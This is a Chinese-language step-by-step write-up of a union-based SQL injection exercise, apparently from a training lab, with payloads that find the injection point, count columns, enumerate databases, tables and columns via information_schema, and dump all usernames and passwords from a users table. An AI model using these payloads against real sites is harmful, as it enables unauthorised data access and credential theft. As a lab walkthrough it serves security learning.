判断注入点
使用?id=1’) and 1=2 —+与?id=1’) and 1=1 —+可以判断出存在注入点
判断字段数量
使用?id=1’) order by 4 —+ 与?id=1’) order by 3可以判断出字段数量是3 —+
判断回显数据的点
使用?id=-1’) union select 1,2,3 —+可以判断出2,3两个位置可以回显数据
爆破数据库名称
使用?id=-1’) union select 1,group_concat(schema_name),3 from information_schema.schemata —+爆出数据库的名称为:
information_schema,challenges,mysql,performance_schema,security
爆破表的名称
使用?id=-1’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = ‘security’ —+爆破出security数据库中的表的名称为:emails,referers,uagents,users
爆破字段名
通过使用 ?id=-1’) union select 1,group_concat(column_name),3 from information_schema.columns where table_name = ‘users’ —+爆破出users表中的字段的名称为:id,username,password
爆破数据
现在已经知道了数据库、表、字段的名称,接下来就是愉快的爆数据的环节了。
通过使用?id=-1’) union select 1,group_concat(username),group_concat(password) from security.users —+得到security数据库中users表中的数据为:
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4